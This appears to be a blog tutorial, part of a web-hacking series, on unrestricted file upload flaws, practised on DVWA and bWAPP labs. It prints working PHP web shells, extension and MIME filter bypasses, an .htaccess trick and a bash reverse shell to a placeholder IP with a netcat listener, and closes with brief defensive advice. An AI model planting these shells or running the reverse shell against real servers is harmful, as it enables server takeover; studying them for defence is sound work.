π‘ Introduction
File upload features are common in web apps β think profile pictures, documents, resumes.
But when poorly secured, these features let attackers upload:
Malware
PHP web shells
Reverse shell scripts
Persistent backdoors
In this part, you’ll learn how to:
β
Find insecure upload forms
β
Bypass file filters
β
Deploy and trigger a web shell
π§ What Is an Unrestricted File Upload?
Itβs when a web app allows users to:
Upload any file type
Rename extensions (e.g.
.phpinstead of.jpg)Execute scripts from the upload directory
This leads to Remote Code Execution (RCE) β attackers can fully control the server.
π§ͺ Detecting a Vulnerable Upload
Red flags:
Accepts any file extension (
.php,.exe,.sh)Upload folder is public (
/uploads/filename.php)No MIME or content validation
Error messages during upload leaks info
βοΈ Practice with DVWA / bWAPP
1. Try uploading:
A
.phpfile:
<?php echo shell_exec($_GET['cmd']); ?>2. Visit:
You should see the command output β proof of RCE.
π₯ Upload Filter Bypass Techniques
π Obfuscation:
Rename
.phpto.php.jpgUse
.ph%00p(null byte injection)Upload
.htaccessto enable script execution
πͺ MIME Type Spoofing:
Intercept request in Burp
Change
Content-Type: image/jpegfor a.phpfile
𧩠Double Extension Trick:
πͺ Rename with HTAccess (Apache only)
Upload
.htaccesswith:
SetHandler application/x-httpd-phpAddType application/x-httpd-php .jpg
Now .jpg files are executed as PHP.
π Deploying a Web Shell
Popular PHP shell scripts:
<?php system($_GET['cmd']); ?>Or use:
<?php passthru($_REQUEST['cmd']); ?>Access like:
π§ Reverse Shell (Advanced)
1. Setup listener:
nc -lvnp 44442. Upload and trigger shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR-IP/4444 0>&1'"); ?>3. Trigger in browser:
Boom β your terminal lights up with a shell.
π‘οΈ How to Prevent File Upload Exploits
From the defenderβs side:
β Donβt allow
.php,.exe,.sh,.js, etc.β Use strict whitelisting (
.jpg,.png,.pdf)β Rename files on upload and store them outside web root
β Verify MIME types and scan uploaded files
β Never allow uploads to executable folders
π Quick Checklist
| Vulnerability | Risk |
|---|---|
| No extension filtering | PHP upload & exec |
| No MIME type check | Bypass via spoof |
| Public uploads folder | Easy access to shell |
| .htaccess override | Execute disguised scripts |
π Wrapping Up
File upload bugs are often missed β but a single upload can mean total system takeover.
You now know:
How to detect upload flaws
Bypass filters
Deploy web shells and reverse shells
How to defend your own upload systems
π Next up:
Part 8 β Broken Authentication & Session Hijacking
We’ll cover how attackers exploit weak login systems to hijack accounts and impersonate users.
1 thought on “File Upload Vulnerabilities & Web Shells”